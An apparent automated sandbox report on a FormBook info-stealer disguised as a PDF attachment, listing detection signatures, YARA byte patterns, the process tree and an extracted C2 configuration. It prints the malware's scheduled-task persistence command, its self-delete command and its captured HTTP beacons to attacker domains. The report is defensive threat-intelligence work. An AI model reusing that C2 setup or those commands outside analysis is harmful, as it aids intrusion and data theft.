Play interactive tour

Edit tour

Analysis Report INQUIRY 1820521 pdf.exe

Overview

General Information

Sample Name:	INQUIRY 1820521 pdf.exe
Analysis ID:	385289
MD5:	dd3ae15e952c239ae6d87c8374b3b460
SHA1:	f8d9daceb3ff1dadabf9051a04bb4356c370fbde
SHA256:	513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

INQUIRY 1820521 pdf.exe (PID: 6928 cmdline: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: DD3AE15E952C239AE6D87C8374B3B460)

schtasks.exe (PID: 7156 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

INQUIRY 1820521 pdf.exe (PID: 2848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)

INQUIRY 1820521 pdf.exe (PID: 1848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)

INQUIRY 1820521 pdf.exe (PID: 1496 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)

INQUIRY 1820521 pdf.exe (PID: 1664 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autochk.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)

ipconfig.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 6852 cmdline: /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x104360:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1045da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x130980:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x130bfa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1100fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13c71d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x10fbe9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13c209:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1101ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13c81f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x110377:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13c997:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x104ff2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x131612:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10ee64:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13b484:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x105ceb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x13230b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x115d9f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1423bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x116da2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x112e81:$sqlite3step: 68 34 1C 7B E1 0x112f94:$sqlite3step: 68 34 1C 7B E1 0x13f4a1:$sqlite3step: 68 34 1C 7B E1 0x13f5b4:$sqlite3step: 68 34 1C 7B E1 0x112eb0:$sqlite3text: 68 38 2A 90 C5 0x112fd5:$sqlite3text: 68 38 2A 90 C5 0x13f4d0:$sqlite3text: 68 38 2A 90 C5 0x13f5f5:$sqlite3text: 68 38 2A 90 C5 0x112ec3:$sqlite3blob: 68 53 D8 7F 8C 0x112feb:$sqlite3blob: 68 53 D8 7F 8C 0x13f4e3:$sqlite3blob: 68 53 D8 7F 8C 0x13f60b:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: INQUIRY 1820521 pdf.exe PID: 6928	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' , ParentImage: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe, ParentProcessId: 6928, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', ProcessId: 7156

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe	Metadefender: Detection: 13%			Perma Link
Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Show sources

Source: INQUIRY 1820521 pdf.exe	Virustotal: Detection: 39%	Perma Link
Source: INQUIRY 1820521 pdf.exe	Metadefender: Detection: 13%	Perma Link
Source: INQUIRY 1820521 pdf.exe	ReversingLabs: Detection: 41%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: INQUIRY 1820521 pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: INQUIRY 1820521 pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ipconfig.pdb source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 1820521 pdf.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.auggiepaws.com/gnk/

Source: global traffic	HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1Host: www.hhcuerkn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1Host: www.mobcitylabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1Host: www.xinghai-nb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.185.159.144 198.185.159.144

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: IDCFIDCFrontierIncJP IDCFIDCFrontierIncJP

Source: C:\Windows\explorer.exe

Code function: 10_2_04DFB782 getaddrinfo,setsockopt,recv,

Source: global traffic	HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1Host: www.hhcuerkn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1Host: www.mobcitylabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1Host: www.xinghai-nb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.hhcuerkn.com

Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp	String found in binary or memory: http://en.wikip
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
